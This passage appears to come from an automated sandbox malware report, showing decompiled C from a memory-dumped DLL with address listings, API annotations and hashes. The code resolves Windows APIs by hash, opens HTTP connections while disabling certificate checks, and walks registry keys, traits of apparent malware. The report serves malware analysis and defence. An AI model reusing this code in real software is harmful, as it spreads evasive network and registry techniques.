					if( *((char*)(_t249 + 0xc)) == 0) {
						L71:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = 0;
						goto L17;
					} else {
						_t180 =  *(_t249 + 8);
						__eflags = _t180;
						if(_t180 == 0) {
							L67:
							_t162 = 1;
						} else {
							__eflags = _t180 - 0xffffffff;
							if(_t180 == 0xffffffff) {
								goto L67;
							} else {
								_t162 = _t244;
							}
						}
						__eflags = _t162;
						if(_t162 != 0) {
							goto L71;
						} else {
							_t163 = E6E7915C0(0xd27f045a, 0xdda3415f);
							__eflags = _t163;
							if(_t163 == 0) {
								goto L71;
							} else {
								_push(_t180);
								asm("int3");
								return _t163;
							}
						}
					}
				} else {
					_t164 =  *0x6e7bb248; // 0xe3a10e7e
					_t165 = InternetConnectW(_t164, _t254[0x2c], _t172, _t244, _t244, 3, _t244, _t244); // executed
					_t181 = _t165;
					if( *((char*)(_t249 + 0xc)) == 0) {
						L14:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = _t181;
						__eflags = _t181;
						if(_t181 == 0) {
							L17:
							_t109 = 1;
						} else {
							__eflags = _t181 - 0xffffffff;
							if(_t181 == 0xffffffff) {
								goto L17;
							} else {
								_t109 = _t244;
							}
						}
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t249 = E6E797F00();
							E6E798CA0( &(_t254[0x20]));
							E6E798CA0( &(_t254[0x1c]));
							E6E7A0B10( &(_t254[0xe]));
							E6E7A0B10( &(_t254[0xa]));
							E6E7A0B10( &(_t254[6]));
							E6E7A0B10( &(_t254[2]));
							__eflags = 0;
							return 0;
						} else {
							__eflags =  *(_t249 + 0x18) - 1;
							if( *(_t249 + 0x18) == 1) {
								_t254[0x2c] = 0x80a03200;
							} else {
								_t254[0x2c] = 0x80203200;
							}
							_t118 = E6E7915C0(0xd27f045a, 0x8813e141);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L62:
									 *((char*)(_t249 + 0x14)) = 1;
									_t174 = _t244;
									 *(_t249 + 0x10) = 0;
									goto L34;
								} else {
									_t177 =  *(_t249 + 0x10);
									__eflags = _t177;
									if(_t177 == 0) {
										L58:
										_t153 = 1;
									} else {
										__eflags = _t177 - 0xffffffff;
										if(_t177 == 0xffffffff) {
											goto L58;
										} else {
											_t153 = _t244;
										}
									}
									__eflags = _t153;
									if(_t153 != 0) {
										goto L62;
									} else {
										_t154 = E6E7915C0(0xd27f045a, 0xdda3415f);
										__eflags = _t154;
										if(_t154 == 0) {
											goto L62;
										} else {
											_push(_t177);
											asm("int3");
											return _t154;
										}
									}
								}
							} else {
								_t155 =  *((intOrPtr*)(_t249 + 0x1c));
								__eflags = _t155 - 1;
								_t156 =  !=  ? _t244 : _t155;
								E6E797B30(_t155 - 1,  &(_t254[0x18]), 0x6e7baa40,  !=  ? _t244 : _t155);
								_t158 = HttpOpenRequestW( *(_t249 + 8), _t254[0x24], _t254[0x26], _t244, _t244, _t244, _t254[0x2e], _t244); // executed
								_t179 = _t158;
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L31:
									 *(_t249 + 0x10) = _t179;
									 *((char*)(_t249 + 0x14)) = 1;
									E6E798CA0( &(_t254[0x18]));
									_t174 =  *(_t249 + 0x10);
									__eflags = _t174;
									if(_t174 == 0) {
										L34:
										_t119 = 1;
									} else {
										__eflags = _t174 - 0xffffffff;
										if(_t174 == 0xffffffff) {
											goto L34;
										} else {
											_t119 = _t244;
										}
									}
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t249 = E6E797F00();
										E6E798CA0( &(_t254[0x20]));
										E6E798CA0( &(_t254[0x1c]));
										E6E7A0B10( &(_t254[0xe]));
										E6E7A0B10( &(_t254[0xa]));
										E6E7A0B10( &(_t254[6]));
										E6E7A0B10( &(_t254[2]));
										__eflags = 0;
										return 0;
									} else {
										_t128 =  *0x6e7bb244; // 0xb7b294eb
										__eflags = _t128 - 0xb7b294eb;
										if(_t128 != 0xb7b294eb) {
											E6E7B2760( &(_t254[0x18]),  *_t128, 0xffffffff);
											_t151 =  *0x6e7bb27c; // 0x0
											while(1) {
												__eflags =  *(_t151 + _t244 * 8);
												if( *(_t151 + _t244 * 8) == 0) {
													break;
												}
												_t244 =  &(_t244[0]);
												__eflags = _t244 - 0x1000;
												if(_t244 < 0x1000) {
													continue;
												}
												L40:
												E6E7B2810(_t151,  &(_t254[0x14]));
												goto L41;
											}
											 *(_t151 + _t244 * 8) = _t174;
											_t151 = E6E7910E0(0);
											_t230 =  *0x6e7bb27c; // 0x0
											 *((intOrPtr*)(_t230 + 4 + _t244 * 8)) = _t151;
											goto L40;
										}
										L41:
										_t129 =  *(_t249 + 0x40);
										__eflags = _t129;
										if(_t129 != 0) {
											_t254[0x12] = _t129 * 0x3e8;
											_t228 = E6E7915C0(0xd27f045a, 0x863455c4);
											__eflags = _t228;
											if(_t228 != 0) {
												 *_t228( *(_t249 + 0x10), 5,  &(_t254[0x12]), 4);
											}
											_t229 = E6E7915C0(0xd27f045a, 0x863455c4);
											__eflags = _t229;
											if(_t229 != 0) {
												 *_t229( *(_t249 + 0x10), 6,  &(_t254[0x12]), 4);
											}
										}
										_t254[0x2e] = 4;
										_t209 = E6E7915C0(0xd27f045a, 0x9217c72);
										__eflags = _t209;
										if(_t209 != 0) {
											 *_t209( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]),  &(_t254[0x2e]));
										}
										_t254[0x2c] = _t254[0x2c] | 0x00003380;
										_t226 = E6E7915C0(0xd27f045a, 0x863455c4);
										__eflags = _t226;
										if(_t226 != 0) {
											 *_t226( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]), _t254[0x2e]);
										}
										E6E798CA0( &(_t254[0x20]));
										E6E798CA0( &(_t254[0x1c]));
										E6E7A0B10( &(_t254[0xe]));
										E6E7A0B10( &(_t254[0xa]));
										E6E7A0B10( &(_t254[6]));
										E6E7A0B10( &(_t254[2]));
										return 1;
									}
								} else {
									_t240 =  *(_t249 + 0x10);
									__eflags = _t240;
									if(_t240 == 0) {
										L27:
										_t160 = 1;
									} else {
										__eflags = _t240 - 0xffffffff;
										if(_t240 == 0xffffffff) {
											goto L27;
										} else {
											_t160 = _t244;
										}
									}
									__eflags = _t160;
									if(_t160 != 0) {
										goto L31;
									} else {
										_t161 = E6E7915C0(0xd27f045a, 0xdda3415f);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L31;
										} else {
											_push(_t240);
											asm("int3");
											return _t161;
										}
									}
								}
							}
						}
					} else {
						_t241 =  *(_t249 + 8);
						if(_t241 == 0 || _t241 == 0xffffffff) {
							_t166 = 1;
						} else {
							_t166 = _t244;
						}
						if(_t166 != 0) {
							goto L14;
						} else {
							_t167 = E6E7915C0(0xd27f045a, 0xdda3415f);
							if(_t167 == 0) {
								goto L14;
							} else {
								_push(_t241);
								asm("int3");
								return _t167;
							}
						}
					}
				}
			}

0x6e7b3374
0x6e7b3377
0x6e7b337d
0x6e7b337f
0x6e7b3389
0x6e7b3394
0x6e7b339f
0x6e7b33aa
0x6e7b33b4
0x6e7b33b9
0x6e7b33c2
0x6e7b33cf
0x6e7b33dc
0x6e7b33eb
0x6e7b33fa
0x6e7b3407
0x6e7b3410
0x6e7b3419
0x6e7b3429
0x6e7b342b
0x6e7b343f
0x6e7b3449
0x6e7b3454
0x6e7b3459
0x6e7b345b
0x6e7b345b
0x6e7b344b
0x6e7b344b
0x6e7b344b
0x6e7b3449
0x6e7b3475
0x6e7b37cf
0x6e7b37d3
0x6e7b3804
0x6e7b3804
0x6e7b3808
0x00000000
0x6e7b37d5
0x6e7b37d5
0x6e7b37d8
0x6e7b37da
0x6e7b37e5
0x6e7b37e5
0x6e7b37dc
0x6e7b37dc
0x6e7b37df
0x00000000
0x6e7b37e1
0x6e7b37e1
0x6e7b37e1
0x6e7b37df
0x6e7b37ea
0x6e7b37ec
0x00000000
0x6e7b37ee
0x6e7b37f8
0x6e7b37fd
0x6e7b37ff
0x00000000
0x6e7b3801
0x6e7b3801
0x6e7b3802
0x6e7b3803
0x6e7b3803
0x6e7b37ff
0x6e7b37ec
0x6e7b347b
0x6e7b3486
0x6e7b348c
0x6e7b348e
0x6e7b3494
0x6e7b34c5
0x6e7b34c5
0x6e7b34c9
0x6e7b34cc
0x6e7b34ce
0x6e7b34d9
0x6e7b34d9
0x6e7b34d0
0x6e7b34d0
0x6e7b34d3
0x00000000
0x6e7b34d5
0x6e7b34d5
0x6e7b34d5
0x6e7b34d3
0x6e7b34de
0x6e7b34e0
0x6e7b36e0
0x6e7b36e7
0x6e7b36f0
0x6e7b36f9
0x6e7b3702
0x6e7b370b
0x6e7b3714
0x6e7b3719
0x6e7b3722
0x6e7b34e6
0x6e7b34e6
0x6e7b34ea
0x6e7b34f6
0x6e7b34ec
0x6e7b34ec
0x6e7b34ec
0x6e7b3508
0x6e7b350f
0x6e7b3511
0x6e7b3788
0x6e7b378c
0x6e7b37bd
0x6e7b37bd
0x6e7b37c1
0x6e7b37c3
0x00000000
0x6e7b378e
0x6e7b378e
0x6e7b3791
0x6e7b3793
0x6e7b379e
0x6e7b379e
0x6e7b3795
0x6e7b3795
0x6e7b3798
0x00000000
0x6e7b379a
0x6e7b379a
0x6e7b379a
0x6e7b3798
0x6e7b37a3
0x6e7b37a5
0x00000000
0x6e7b37a7
0x6e7b37b1
0x6e7b37b6
0x6e7b37b8
0x00000000
0x6e7b37ba
0x6e7b37ba
0x6e7b37bb
0x6e7b37bc
0x6e7b37bc
0x6e7b37b8
0x6e7b37a5
0x6e7b3517
0x6e7b3517
0x6e7b351a
0x6e7b3524
0x6e7b352e
0x6e7b3544
0x6e7b3546
0x6e7b3548
0x6e7b354c
0x6e7b357d
0x6e7b357d
0x6e7b3584
0x6e7b3588
0x6e7b358d
0x6e7b3590
0x6e7b3592
0x6e7b359d
0x6e7b359d
0x6e7b3594
0x6e7b3594
0x6e7b3597
0x00000000
0x6e7b3599
0x6e7b3599
0x6e7b3599
0x6e7b3597
0x6e7b35a2
0x6e7b35a4
0x6e7b3743
0x6e7b374a
0x6e7b3753
0x6e7b375c
0x6e7b3765
0x6e7b376e
0x6e7b3777
0x6e7b377c
0x6e7b3785
0x6e7b35aa
0x6e7b35aa
0x6e7b35af
0x6e7b35b4
0x6e7b35be
0x6e7b35c3
0x6e7b35c8
0x6e7b35c8
0x6e7b35cc
0x00000000
0x00000000
0x6e7b35d2
0x6e7b35d3
0x6e7b35d9
0x00000000
0x00000000
0x6e7b35db
0x6e7b35df
0x00000000
0x6e7b35df
0x6e7b3727
0x6e7b372a
0x6e7b372f
0x6e7b3735
0x00000000
0x6e7b3735
0x6e7b35e4
0x6e7b35e4
0x6e7b35e7
0x6e7b35e9
0x6e7b35f1
0x6e7b3604
0x6e7b3606
0x6e7b3608
0x6e7b3616
0x6e7b3616
0x6e7b3627
0x6e7b3629
0x6e7b362b
0x6e7b3639
0x6e7b3639
0x6e7b362b
0x6e7b363b
0x6e7b3652
0x6e7b3654
0x6e7b3656
0x6e7b3667
0x6e7b3667
0x6e7b3669
0x6e7b3680
0x6e7b3682
0x6e7b3684
0x6e7b3694
0x6e7b3694
0x6e7b369a
0x6e7b36a3
0x6e7b36ac
0x6e7b36b5
0x6e7b36be
0x6e7b36c7
0x6e7b36d8
0x6e7b36d8
0x6e7b354e
0x6e7b354e
0x6e7b3551
0x6e7b3553
0x6e7b355e
0x6e7b355e
0x6e7b3555
0x6e7b3555
0x6e7b3558
0x00000000
0x6e7b355a
0x6e7b355a
0x6e7b355a
0x6e7b3558
0x6e7b3563
0x6e7b3565
0x00000000
0x6e7b3567
0x6e7b3571
0x6e7b3576
0x6e7b3578
0x00000000
0x6e7b357a
0x6e7b357a
0x6e7b357b
0x6e7b357c
0x6e7b357c
0x6e7b3578
0x6e7b3565
0x6e7b354c
0x6e7b3511
0x6e7b3496
0x6e7b3496
0x6e7b349b
0x6e7b34a6
0x6e7b34a2
0x6e7b34a2
0x6e7b34a2
0x6e7b34ad
0x00000000
0x6e7b34af
0x6e7b34b9
0x6e7b34c0
0x00000000
0x6e7b34c2
0x6e7b34c2
0x6e7b34c3
0x6e7b34c4
0x6e7b34c4
0x6e7b34c0
0x6e7b34ad
0x6e7b3494

APIs

InternetConnectW.WININET(E3A10E7E,?,00000000,00000000,00000000,00000003,00000000,00000000,D27F045A,0E214CDE,?,00000000,?,00000000,00000000,00000000), ref: 6E7B348C
HttpOpenRequestW.WININET(A1310F65,?,?,00000000,00000000,00000000,?,00000000,?,6E7BAA40,A1310F65,D27F045A,8813E141), ref: 6E7B3544

Part of subcall function 6E7910E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E791124

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConnectHttpInternetOpenRequestUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3503947753-0
Opcode ID: cab3862fd79d2e1a44cabfabfc2e3272267996c61293899d368fe452bda78e89
Instruction ID: f677691ba314c60809192236a20c7cccd9a0d6b0680d8d922e691e7e374e43ea
Opcode Fuzzy Hash: cab3862fd79d2e1a44cabfabfc2e3272267996c61293899d368fe452bda78e89
Instruction Fuzzy Hash: 45C1C430214205BBE701DFA9CE98BEF77ADAF81358F004D28F565862B4EBB0D985DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E7ACAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E7ACAE0(void* __ecx) {
				void* __esi;
				intOrPtr _t49;
				int* _t50;
				void* _t52;
				void* _t62;
				int _t99;
				intOrPtr* _t100;
				void* _t101;
				signed short* _t102;
				void* _t129;
				char* _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t146;

				_t143 = __ecx;
				_push(0);
				E6E7A9350(_t146 + 0x14);
				_t49 =  *((intOrPtr*)(__ecx + 4));
				if(_t49 == 0 || _t49 == 0xffffffff) {
					_t50 = 1;
				} else {
					_t50 = 0;
				}
				if(_t50 != 0) {
					L11:
					_t99 = 0;
				} else {
					_t139 =  *((intOrPtr*)(_t146 + 0x44));
					if(_t139 == 0 ||  *_t139 != 0) {
						_t129 = _t146 + 8;
						 *((intOrPtr*)(_t129 + 0x18)) = 0;
						 *((intOrPtr*)(_t129 + 0x1c)) = 0;
						E6E7987A0(_t129);
						if(E6E7915C0(0x3ab94787, 0x7c5744d4) != 0) {
							RegQueryValueExW( *(_t143 + 4),  *(_t146 + 0x18), 0, _t146 + 0x20, 0, _t146 + 0x24); // executed
						}
						_t89 =  *(_t146 + 0x24);
						if( *(_t146 + 0x24) != 0) {
							E6E7A9670(_t146 + 0x14, _t89);
							if(E6E7915C0(0x3ab94787, 0x7c5744d4) != 0) {
								_t142 =  *(_t143 + 4);
								RegQueryValueExW( *(_t143 + 4),  *(_t146 + 8), 0, _t146 + 0x20, E6E7A9640(_t146 + 0x14, 0), _t146 + 0x24); // executed
							}
							_t99 =  *(_t146 + 0x20);
							E6E798CA0(_t146 + 8);
						} else {
							E6E798CA0(_t146 + 8);
							goto L11;
						}
					} else {
						goto L11;
					}
				}
				if(_t99 == 2) {
					_t100 = E6E7915C0(0xa1310f65, 0x6ad451b6);
					if(_t100 != 0) {
						_t52 = E6E7A9640(_t146 + 0x14, 0);
						 *_t100(_t52, 0, 0);
						_t101 = 0;
					} else {
						_t101 = 0;
					}
					E6E798810(_t146, _t101);
					_t144 = E6E7915C0(0xa1310f65, 0x6ad451b6);
					if(_t144 != 0) {
						_t62 = E6E7A9640(_t146 + 0x14, 0);
						 *_t144(_t62,  *((intOrPtr*)(_t146 + 4)), _t101);
					}
					E6E7988C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
					E6E798CA0(_t146);
					E6E7A9510(_t146 + 0x10);
					return  *((intOrPtr*)(_t146 + 0x40));
				} else {
					if(_t99 != 7) {
						if(_t99 != 1) {
							E6E798810( *((intOrPtr*)(_t146 + 0x44)), 0);
							E6E7A9510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						} else {
							E6E798AB0( *((intOrPtr*)(_t146 + 0x48)), E6E7A9640(_t146 + 0x14, 0), 0);
							E6E7A9510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						}
					} else {
						E6E798810(_t146 + 4, 0);
						_t102 = E6E7A9640(_t146 + 0x14, 0);
						while(( *_t102 & 0x0000ffff) != 0) {
							if(E6E7A0180( *_t146, 0x7fffffff, _t142) != 0) {
								E6E7996D0(_t146 + 4, 0xa);
							}
							E6E798AB0(_t146 + 0x30, _t102, 0);
							E6E7A0220(_t146 + 8,  *((intOrPtr*)(_t146 + 0x2c)), 0);
							_t102 = _t102 + 2 + E6E7A0180( *((intOrPtr*)(_t146 + 0x28)), 0x7fffffff, _t142) * 2;
							E6E798CA0(_t146 + 0x28);
						}
						E6E7988C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
						E6E798CA0(_t146);
						E6E7A9510(_t146 + 0x10);
						return  *((intOrPtr*)(_t146 + 0x40));
					}
				}
			}

0x6e7acae6
0x6e7acae8
0x6e7acaee
0x6e7acaf3
0x6e7acaf8
0x6e7acb03
0x6e7acaff
0x6e7acaff
0x6e7acaff
0x6e7acb0a
0x6e7acb6b
0x6e7acb6b
0x6e7acb0c
0x6e7acb0c
0x6e7acb12
0x6e7acb1b
0x6e7acb1f
0x6e7acb22
0x6e7acb25
0x6e7acb3d
0x6e7acb54
0x6e7acb54
0x6e7acb56
0x6e7acb5c
0x6e7acd05
0x6e7acd1d
0x6e7acd1f
0x6e7acd42
0x6e7acd42
0x6e7acd44
0x6e7acd4c
0x6e7acb62
0x6e7acb66
0x00000000
0x6e7acb66
0x00000000
0x00000000
0x00000000
0x6e7acb12
0x6e7acb70
0x6e7acc84
0x6e7acc88
0x6e7acc94
0x6e7acca0
0x6e7acca2
0x6e7acc8a
0x6e7acc8a
0x6e7acc8a
0x6e7acca8
0x6e7accbc
0x6e7accc0
0x6e7accc8
0x6e7accd3
0x6e7accd3
0x6e7accdd
0x6e7acce5
0x6e7accee
0x6e7accfd
0x6e7acb76
0x6e7acb79
0x6e7acc25
0x6e7acc5a
0x6e7acc63
0x6e7acc72
0x6e7acc27
0x6e7acc39
0x6e7acc42
0x6e7acc51
0x6e7acc51
0x6e7acb7f
0x6e7acb85
0x6e7acb95
0x6e7acb9c
0x6e7acbad
0x6e7acbb5
0x6e7acbb5
0x6e7acbc1
0x6e7acbd0
0x6e7acbe7
0x6e7acbeb
0x6e7acbf3
0x6e7acbff
0x6e7acc07
0x6e7acc10
0x6e7acc1f
0x6e7acc1f
0x6e7acb79

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,3AB94787,7C5744D4,00000000), ref: 6E7ACB54

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction ID: 7b7959ce1c9f4367bd9aeab0e95f3a1e6b01747f11e637144846c98ff69aa837
Opcode Fuzzy Hash: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction Fuzzy Hash: DE615530218201ABE344DFA8DE95FAB73ECAF95648F100E2CB6559A1E0EF21DD14DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7AC790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6E7AC790(void* __ecx, void* __edx) {
				intOrPtr _t21;
				int* _t22;
				char* _t47;
				void* _t50;
				void* _t53;

				 *((intOrPtr*)(_t53 + 0x18)) = 0;
				_t50 = __ecx;
				_push(0);
				E6E7A9350(_t53 + 4);
				_t21 =  *((intOrPtr*)(__ecx + 4));
				if(_t21 == 0 || _t21 == 0xffffffff) {
					_t22 = 1;
				} else {
					_t22 = 0;
				}
				if(_t22 != 0) {
					L10:
					E6E7A9510(_t53);
					return  *((intOrPtr*)(_t53 + 0x18));
				} else {
					_t47 =  *(_t53 + 0x2c);
					if(_t47 == 0 ||  *_t47 != 0) {
						 *(_t53 + 0x10) = 0;
						 *(_t53 + 0x14) = 0;
						if(E6E7915C0(0x3ab94787, 0x8883f185) != 0) {
							RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, 0, _t53 + 0x14); // executed
						}
						_t26 =  *(_t53 + 0x14);
						if( *(_t53 + 0x14) != 0) {
							E6E7A9670(_t53 + 4, _t26);
							if(E6E7915C0(0x3ab94787, 0x8883f185) != 0) {
								RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, E6E7A9640(_t53 + 4, 0), _t53 + 0x14); // executed
							}
							if( *(_t53 + 0x10) == 4) {
								E6E7A97D0(_t53 + 8, _t53 + 0x18, 4);
							}
						}
					}
					goto L10;
				}
			}

0x6e7ac798
0x6e7ac79c
0x6e7ac79e
0x6e7ac7a3
0x6e7ac7a8
0x6e7ac7ad
0x6e7ac7b8
0x6e7ac7b4
0x6e7ac7b4
0x6e7ac7b4
0x6e7ac7bf
0x6e7ac805
0x6e7ac80c
0x6e7ac819
0x6e7ac7c1
0x6e7ac7c1
0x6e7ac7c7
0x6e7ac7ce
0x6e7ac7d2
0x6e7ac7e9
0x6e7ac7fb
0x6e7ac7fb
0x6e7ac7fd
0x6e7ac803
0x6e7ac821
0x6e7ac839
0x6e7ac85a
0x6e7ac85a
0x6e7ac861
0x6e7ac86e
0x6e7ac86e
0x6e7ac861
0x6e7ac803
0x00000000
0x6e7ac7c7

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,8883F185,00000000), ref: 6E7AC7FB
RegQueryValueExA.KERNELBASE(?,?,00000000,8883F185,00000000,00000000,00000000,8883F185,?,8883F185,00000000), ref: 6E7AC85A

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction ID: 7e8b884f6e95342bddcec67fc91b2d6803b8b6cc447a2a218999cdbbe892f795
Opcode Fuzzy Hash: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction Fuzzy Hash: D7219431208317BBD711DE68DE14EAB77ECAF90B14F010A2DF6559A160E730D909CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E7AC2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E7AC2D0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, void* _a8, void* _a12) {
				char _v28;
				char _v32;
				unsigned int _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				long* _v56;
				long _v60;
				long* _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				long _v80;
				unsigned int _t57;
				signed int* _t59;
				void* _t62;
				void* _t66;
				void* _t74;
				long _t75;
				void* _t76;
				void** _t77;
				long _t78;
				long* _t82;
				void* _t83;
				long _t84;
				long _t102;
				short* _t107;
				long _t117;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t125;
				long _t127;
				void* _t130;
				long _t132;
				intOrPtr _t135;
				long _t136;
				long _t140;
				void* _t142;
				long* _t143;

				_push(__esi);
				_push(__edi);
				_t143 = _t142 - 0x40;
				_t82 = __ecx;
				E6E793930(__ecx, 0, __edi, __esi);
				_t130 =  !=  ? 0 : 0x100;
				_t121 =  <=  ? 0x3000f : 0x20009;
				_t122 = ( <=  ? 0x3000f : 0x20009) | 0x00000100;
				E6E798810( &_v40, 0x104);
				_t107 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t107 != 0) {
					 *_t107 = 0;
				}
				_t140 = _a8;
				_t57 = E6E7A9650(_a4) >> 2;
				if(_t57 > 0) {
					_v56 =  &(_t82[3]);
					_v44 = 0;
					_t16 = _t57 - 1; // -1
					_v76 = _t122;
					_v68 = _t16;
					_v72 = _t130 + 0x20009;
					_t132 = 0;
					_v52 = _t57;
					_v64 = _t82;
					_t123 = 0;
					while(1) {
						L15:
						_t59 = E6E7A9640(_a4, _t123 * 4);
						_t83 = 0;
						_v48 = _t123;
						_t124 =  *_t59 ^ 0x38ba5c7b;
						_v52 = _t132;
						while(1) {
							_t62 = E6E7915C0(0x3ab94787, 0xf561ae8b);
							if(_t62 != 0) {
								break;
							}
							E6E79A0D0( &_v40,  &_v32);
							E6E7983B0( &_v28);
							_t66 = E6E7AD620(_v28, E6E7A6040(_v28, 0x7fffffff));
							E6E7A0B10( &_v28);
							if(_t66 != _t124) {
								E6E798CA0( &_v32);
								_t83 = _t83 + 1;
								continue;
							} else {
								_t125 = _v44;
								_t135 =  *((intOrPtr*)( &_v32 - 0x10));
								E6E798CA0( &_v32);
								if(_t125 != 0) {
									E6E7996D0(_v56, 0x5c);
								}
								E6E7A0220(_v56, _v40, 0);
								_v68 = 0;
								if(E6E7915C0(0x3ab94787, 0xd5493f9) == 0) {
									_t117 = 0;
								} else {
									_t77 =  &_v60;
									_t104 =  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc));
									_t78 = RegOpenKeyExW(_a8,  *(_t77[1]), 0,  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc)), _t77); // executed
									_t117 = _t78;
								}
								_t84 = _v60;
								if(_t84 == 0 || _t84 == 0xffffffff) {
									L37:
									_t82 = _v64;
									_t136 = _t117;
									goto L4;
								} else {
									if(_t135 == 0) {
										L34:
										_t123 = _t125 + 1;
										_t140 = _t84;
										if(_t123 < _v52) {
											_t132 = 1;
											goto L15;
										} else {
											goto L37;
										}
									} else {
										if(_t140 == 0 || _t140 == 0xffffffff) {
											_t75 = 1;
										} else {
											_t75 = 0;
										}
										if(_t75 != 0) {
											goto L34;
										} else {
											_v80 = _t117;
											_t76 = E6E7915C0(0x3ab94787, 0x91935d4e);
											_t117 =  *_t143;
											if(_t76 == 0) {
												goto L34;
											} else {
												_push(_t140);
												_v80 = _t117;
												asm("int3");
												return _t76;
											}
										}
									}
								}
							}
							goto L38;
						}
						_push(_v36 >> 1);
						_push(_v40);
						_push(_t83);
						_push(_t140);
						asm("int3");
						return _t62;
						goto L38;
					}
				} else {
					_t136 = 0;
					L4:
					if(_t82[2] == 0) {
						L12:
						_t82[1] = _t140;
						_t82[2] = 1;
						E6E798CA0( &_v40);
						 *_t82 = _t136;
						return _t136;
					} else {
						_t127 = _t82[1];
						if(_t127 == 0 || _t127 == 0xffffffff) {
							_t102 = 1;
						} else {
							_t102 = 0;
						}
						if(_t102 != 0) {
							goto L12;
						} else {
							_t74 = E6E7915C0(0x3ab94787, 0x91935d4e);
							if(_t74 == 0) {
								goto L12;
							} else {
								_push(_t127);
								asm("int3");
								return _t74;
							}
						}
					}
				}
				L38:
			}

0x6e7ac2d0
0x6e7ac2d1
0x6e7ac2d4
0x6e7ac2d7
0x6e7ac2db
0x6e7ac2f4
0x6e7ac30b
0x6e7ac30e
0x6e7ac310
0x6e7ac315
0x6e7ac31a
0x6e7ac31e
0x6e7ac31e
0x6e7ac325
0x6e7ac32e
0x6e7ac333
0x6e7ac393
0x6e7ac399
0x6e7ac39d
0x6e7ac3a0
0x6e7ac3a4
0x6e7ac3a8
0x6e7ac3ac
0x6e7ac3ae
0x6e7ac3b2
0x6e7ac3b6
0x6e7ac3bf
0x6e7ac3bf
0x6e7ac3cb
0x6e7ac3d2
0x6e7ac3d9
0x6e7ac3dd
0x6e7ac3df
0x6e7ac3e3
0x6e7ac3ed
0x6e7ac3f4
0x00000000
0x00000000
0x6e7ac418
0x6e7ac425
0x6e7ac43e
0x6e7ac449
0x6e7ac450
0x6e7ac523
0x6e7ac528
0x00000000
0x6e7ac456
0x6e7ac456
0x6e7ac45e
0x6e7ac461
0x6e7ac468
0x6e7ac470
0x6e7ac470
0x6e7ac47f
0x6e7ac484
0x6e7ac49f
0x6e7ac4c3
0x6e7ac4a1
0x6e7ac4a5
0x6e7ac4ac
0x6e7ac4bd
0x6e7ac4bf
0x6e7ac4bf
0x6e7ac4c5
0x6e7ac4cb
0x6e7ac537
